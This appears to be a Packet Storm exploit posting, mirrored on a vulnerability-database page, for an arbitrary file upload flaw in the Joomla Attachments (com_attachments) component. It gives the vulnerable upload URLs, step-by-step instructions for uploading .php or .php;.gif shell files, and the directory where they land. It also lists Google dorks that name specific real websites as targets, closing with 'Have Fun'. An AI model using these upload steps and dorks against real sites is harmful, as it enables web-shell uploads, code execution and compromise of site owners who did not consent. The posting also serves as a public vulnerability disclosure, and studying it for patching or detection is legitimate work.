Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKingSkrupellosPACKETSTORM:153088
HistoryMay 26, 2019 - 12:00 a.m.

Joomla Attachments 3.x File Upload

2019-05-2600:00:00
KingSkrupellos
packetstormsecurity.com
154
JSON
`####################################################################  
  
# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 26/05/2019  
# Vendor Homepage : jmcameron.net  
# Software Download Links : jmcameron.net/attachments/  
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip  
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip  
joomlacode.org/gf/project/attachments/frs/  
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/  
# Software Information Links : extensions.joomla.org/extension/attachments/  
joomlacode.org/gf/project/attachments/  
joomlacode.org/gf/project/attachments3/  
# Joomla Affected Versions :  
Joomla 3.4.8  
Joomla 3.5.1  
Joomla 3.6.5  
Joomla 3.8.1  
Joomla 3.8.11  
Joomla 3.8.3  
Joomla 3.9.6  
# Software Affected Versions [ Component Com_Attachments ] :   
2.2.2 and 3.2.6 - 3.x / All previous versions.  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks :   
inurl:/index.php?option=com_attachments&task=upload  
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.  
intext:Treadmill Desk from TrekDesk  
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla  
intext:Fundación Jesuitas Paraguay  
intext:© 2019 Mars Society Polska  
intext:Designed by atict.com  
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com  
intext:Designed by Burosphere.  
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional  
and more on Google and other Search Engines...... Have Fun....  
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt  
  
####################################################################  
  
# Description about Software :  
***************************  
The 'Attachments' extension allows files to be uploaded and attached to content  
articles in Joomla. Includes a plugin to display attachments and a component  
for uploading and managing attachments.  
  
####################################################################  
  
# Impact :  
***********  
Joomla Attachments Components 3.x and other previous versions could allow a   
remote attacker to upload arbitrary files upload/shell upload, caused by the improper validation   
of file extensions by the multiple scripts to index.php. The issue occurs because   
the application fails to adequately sanitize user-supplied input.   
Exploiting this issue will allow attackers to execute arbitrary code within  
the context of the affected application. This may facilitate unauthorized access   
or privilege escalation; other attacks may also possible.   
By sending a specially-crafted HTTP request, a remote attacker could exploit   
this vulnerability to upload a malicious PHP script, which could allow the   
attacker to execute arbitrary PHP code on the vulnerable system.  
  
####################################################################  
  
# Arbitrary File Upload/Unauthorized File Insertion Exploit :  
****************************************************  
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme  
  
/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme  
  
Click to " Select file to upload instead " - Fill the Form - Published => '' Yes '' and Click " Public "  
  
Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.  
  
# Directory File Path :  
********************  
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`
JSON